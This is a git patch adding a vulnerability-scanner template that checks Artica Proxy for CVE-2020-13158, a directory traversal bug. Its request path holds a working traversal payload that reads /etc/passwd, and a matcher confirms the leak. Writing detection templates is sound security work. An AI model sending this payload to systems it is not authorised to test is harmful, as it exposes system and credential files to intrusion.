From 45f1a055bf97c626e626b967ba6552620c9d0243 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 11 Mar 2022 17:20:55 +0900 Subject: [PATCH] Create CVE-2020-13158.yaml --- CVE-2020-13158.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2020-13158.yaml diff --git a/CVE-2020-13158.yaml b/CVE-2020-13158.yaml new file mode 100644 index 0000000000..5a8b77b70b --- /dev/null +++ b/CVE-2020-13158.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-13158 +info: + name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal + author: 0x_Akoko + severity: high + description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. + reference: + - https://github.com/InfoSec4Fun/CVE-2020-13158 + - https://www.cvedetails.com/cve/CVE-2020-13158 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13158 + cwe-id: CWE-22 + tags: cve,cve2020,artica,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200